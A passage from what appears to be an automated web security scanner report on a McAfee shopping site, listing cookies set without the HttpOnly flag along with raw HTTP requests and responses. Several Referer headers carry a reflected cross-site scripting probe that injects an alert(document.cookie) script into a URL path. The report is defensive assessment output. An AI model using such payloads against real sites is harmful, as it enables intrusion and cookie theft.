HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 11:55:17 GMT
ETag: "5D7pOrfoUlh"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 11:55:17 GMT
Content-Type: image/png; charset=utf-8
Date: Sat, 25 Dec 2010 11:55:17 GMT
Content-Length: 346

GIF89a..................)..)....................^.....j........:........#........~..............>...........2..A.....*..r........T.....~.....M..p...........0...........................................
...[SNIP]...

4.206. http://secureshopping.mcafee.com/images/star_off.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/star_off.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 11:55:17 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/star_off.png HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/browse/babyb75be%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6c34af5df36/toys/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 11:55:17 GMT
ETag: "5D7pOrfoUis"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 11:55:17 GMT
Content-Type: image/png; charset=utf-8
Date: Sat, 25 Dec 2010 11:55:17 GMT
Content-Length: 165

GIF89a.......................................................!.......,..........R.........Z..a..$.(}.r..a..h2K...........\.b.IQ.......`.F..S.%..B.4x!.....(.`.s`....;

4.207. http://secureshopping.mcafee.com/images/star_on.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/images/star_on.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 11:55:17 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/star_on.png HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/browse/babyb75be%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E6c34af5df36/toys/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 11:55:17 GMT
ETag: "5D7pOrfoUlf"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 11:55:17 GMT
Content-Type: image/png; charset=utf-8
Date: Sat, 25 Dec 2010 11:55:17 GMT
Content-Length: 344

GIF89a............Y..i.....-........9..H................................E..q..)..............#.................U........e..K.....\......................G.................!........j..*................
...[SNIP]...

4.208. http://secureshopping.mcafee.com/js/core.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/js/core.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:24 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/core.js?1 HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:25 GMT
ETag: "5D7pOrfoWii"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:24 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:24 GMT
Content-Length: 8347

function m_qt_focus() {
var e = document.getElementById("qt");
if(e) e.focus();
}
function m_qt_search(id) {
var v = document.getElementById(id).value;
if(v == '' || v == 'What are you sho
...[SNIP]...

4.209. http://secureshopping.mcafee.com/js/expand-desc.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/js/expand-desc.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:26 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/expand-desc.js HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/browse/baby/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; __utmb=192341800.7.10.1293269981; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:42:26 GMT
ETag: "5D7pOrfoUwJ"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Sat, 25 Dec 2010 03:42:26 GMT
Content-Length: 1026

window.addEvent('domready', function() {
   var listings = $$('tr.productResult');
   for(var i = 0; i < listings.length; i++){
       listings[i].readmore = listings[i].getElement('.fdlink');
       listings[i]
...[SNIP]...

4.210. http://secureshopping.mcafee.com/js/expand-links.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/js/expand-links.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf&ph=214785577; path=/; expires=Mon, 26-Dec-2011 04:08:38 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/expand-links.js HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/canon-eos-1d-3822b002-mark-iv-digital-slr-camera-body-only-16-1-megapixels--pid-214785577
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; SiteID=1; langid=1; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; __utmz=192341800.1293334644.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/5; __utma=192341800.102881162.1293269981.1293334984.1293336482.6; __utmc=192341800; __utmb=192341800.3.10.1293336482; user=id=1293248423528-1-dMZf&ph=214785577

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Mon, 27 Dec 2010 04:08:38 GMT
ETag: "5D7pOrfoUqe"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf&ph=214785577; path=/; expires=Mon, 26-Dec-2011 04:08:38 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Sun, 26 Dec 2010 04:08:38 GMT
Content-Length: 663

window.addEvent('domready', function() {
$('popsearches').isExpanded = true; //initially set to true then flipped when reasolveReadMoreClick() is run
$('readmorelink').addEvent('click',resolveReadMo
...[SNIP]...

4.211. http://secureshopping.mcafee.com/js/ga_init.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/js/ga_init.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/ga_init.js HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:27 GMT
ETag: "5D7pOrfoUhw"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:27 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:27 GMT
Content-Length: 105

var pageTracker = _gat._getTracker("UA-383036-6");
pageTracker._initData();
pageTracker._trackPageview();

4.212. http://secureshopping.mcafee.com/js/ga_track_click.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/js/ga_track_click.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:26 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/ga_track_click.js HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:27 GMT
ETag: "5D7pOrfoUnE"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:26 GMT
Content-Length: 445

function trackclick(index){
   if (index >= 0){
       if (orderId[index] != null){
           pageTracker._addTrans(
               orderId[index],
               "McAfeeSecureShopping",
               clickValueStr[index],
               "0.00",
               "0.00",
...[SNIP]...

4.213. http://secureshopping.mcafee.com/js/ga_track_click_init.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/js/ga_track_click_init.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:27 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/ga_track_click_init.js HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:40:27 GMT
ETag: "5D7pOrfoUhn"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:40:27 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Sat, 25 Dec 2010 03:40:27 GMT
Content-Length: 96

var orderId = [];
var clickValueStr = [];
var sku = [];
var productName = [];
var category = [];

4.214. http://secureshopping.mcafee.com/js/google_ads_0405616916.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/js/google_ads_0405616916.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:25 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/google_ads_0405616916.js HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/browse/baby/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=192341800.102881162.1293269981.1293269981.1293269981.1; __utmc=192341800; __utmb=192341800.7.10.1293269981; user=id=1293248423528-1-dMZf

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Server: McAfeeSecure
Expires: Sun, 26 Dec 2010 03:42:26 GMT
ETag: "5D7pOrfoUia"
Last-Modified: Mon, 06 Dec 2010 16:59:10 GMT
Accept-Ranges: bytes
Set-Cookie: user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:25 GMT
Content-Type: application/x-javascript; charset=utf-8
Date: Sat, 25 Dec 2010 03:42:25 GMT
Content-Length: 147

google_ad_client = "pub-9942530385485090";
/* Browse Right 160x600 */
google_ad_slot = "0405616916";
google_ad_width = 160;
google_ad_height = 600;

4.215. http://secureshopping.mcafee.com/js/google_ads_7017966687.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://secureshopping.mcafee.com
Path:	/js/google_ads_7017966687.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

user=id=1293248423528-1-dMZf; path=/; expires=Sun, 25-Dec-2011 03:42:25 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/google_ads_7017966687.js HTTP/1.1
Host: secureshopping.mcafee.com
Proxy-Connection: keep-alive
Referer: http://secureshopping.mcafee.com/browse/baby/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2685F2A8051D150D-6000012E2000538B[CE]; WT_FPC=id=248766ad0242431403d1292618077174:lv=1292698189456:ss=1292698189456; s_nr=1292705389773-Repeat; s_ev8=%5B%5B%27performics%27%2C%271292625325755%27%5D%2C%5B%27mcafee%27%2C%271292705389777%27%5D%5D; isvt_visitor=cWHERgoBC2YAACzPVo0AAAAAABdJCVeeyjyDAG; IS3_History=1292380167-1-10_3--1__3_; CampaignId=78228; SessionInfo=AffiliateId=0&CampaignId=78228; session%5Fdata=%3cSessionData%3e%0d%0a++%3ctempfrlu%3e%3c%2ftempfrlu%3e%0d%0a++%3cwt_source%3eOther%3c%2fwt_source%3e%0d%0a%3c%2fSessionData%3e; SiteID=1; langid=1; lUsrCtxSession=%3cUserContext%3e%3cAffID%3e0%3c%2fAffID%3e%3cAffBuildID%3e0%3c%2fAffBuildID%3e%3c%2fUserContext%3e; Currency=56; Locale=EN-US; HPrst=cur=56&gu=e4753ddf-e101-4402-bd18-d2f5270f717b&loc=EN-US; AffID=0-0; HRntm=aff=0-0&cid=78228&pple=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&inur=iq5nNK%2bISQc78yUmSkAv9A%3d%3d&sbo=iq5nNK%2bISQc78yUmSkAv9A%3d%3d; __utmz=192341800.1293269982.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 